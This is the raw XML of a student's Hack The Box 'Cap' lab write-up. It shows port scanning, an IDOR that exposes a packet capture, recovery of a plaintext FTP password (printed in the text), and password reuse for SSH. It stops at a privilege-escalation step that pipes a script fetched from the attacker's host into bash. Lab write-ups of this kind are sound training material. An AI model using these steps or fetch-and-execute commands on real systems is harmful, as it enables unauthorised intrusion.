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Rule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqlkrhwlodh" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deliverables for &lt;Jancuk Pristail&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">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3">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4">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5">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6">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7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_plrogc6ofb7y" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5105400" cy="2865888"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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105400" cy="286588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9">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A">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B">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C">
      <w:pPr>
        <w:ind w:left="72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D">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by</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>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Lydia Gracia (18222035)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">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0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>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2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ppkj19iz21az" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hack The Box - Cap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rih9rt990g7q" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2857500" cy="2857500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cap is an easy difficulty Linux machine running an HTTP server that performs administrative functions including performing network captures. Improper controls result in Insecure Direct Object Reference (IDOR) giving access to another user's capture. The capture contains plaintext credentials and can be used to gain foothold. A Linux capability is then leveraged to escalate to root.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Author</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">InfoSecJack</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Easy</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Release Date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">June 5, 2021</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nopik782spte" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>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Firstly, I used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan all ports and it discovered open port 21 for FTP, 22 for SSH, and 80 for HTTP. </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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3251200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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b w:val="1"/>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While we have FTP service open on port 21, it is unlikely to gain access from this point because we don’t have any information about the credentials.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4714875" cy="2847975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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714875" cy="28479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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gt90blugfk32" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>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It is also unlikely to gain access through SSH, so let’s take a look at HTTP at port 80. This open port indicates that there is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> running on 10.10.10.245. Upon the first look, we are immediately logged in as Nathan. However, we can neither navigate to Message, Settings, nor Log Out function.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4927600"/>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On the left, we can find several menus including Security Snapshot. It initially loads /capture then redirects to /data/1 and here we can download a .pcap file. But here, the number of packets is 0.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5935126" cy="4862513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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35126" cy="48625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The IP Config menu leads to /ip and it seems to print the result of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4927600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Meanwhile, the Network Status menu leads to /netstat and print the result of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5876925" cy="4876800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="674" l="560" r="560" t="674"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="587692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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h02e5hvp7hbg" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR Vulnerability</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I’m just going to go ahead and try different numbers and it turns out that we can access the web page. This is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Direct Object Reference (IDOR) vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where we can manipulate parameters to gain access to other user’s data. On data/0, I found several packets going on.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2463800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vta1i5m9m76c" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Packet Analysis</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I downloaded the file and opened it in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since FTP is a cleartext protocol, we can see the login credentials via .pcap file in a plaintext form. I’m following the TCP stream with the filter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.stream</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or by clicking a TCP packet and pressing Ctrl+Shift+Alt+T. On </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp.stream eq 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we discovered some FTP protocols that might be useful.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3530600"/>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When we look into the FTP packet using Ctrl+Shift+Alt+T, we can actually see the password of Nathan, which is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Buck3tH4TF0RM3!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4876800"/>
            <wp:effectExtent b="0" l="0" r="0" t="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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m32q6wtrcrh2" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nathan FTP Credentials</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Let’s go ahead and try to connect to the FTP server using the credentials on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.10.245</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. As expected, the login is successful.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3248025"/>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Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</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dir -a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but we can’t really do anything interesting here.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2705100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8snq44bpwl1i" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nathan SSH Credentials</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Out of curiosity, we can try to log in SSH using the same credentials as users often use the same password across many platforms. Let’s do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh nathan@10.10.10.245</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Once we’re in, we can do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat user.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and find the flag.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3708400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ak0dnkgvkbol" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>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We can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">linPEAS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do privilege escalation. Firstly, we download the latest release of linpeas.sh on our local using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, we set up a webserver on our linpeas directory using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>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Now, we connect to the HTTP server and execute it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl  </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="188038"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.10.14.92/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
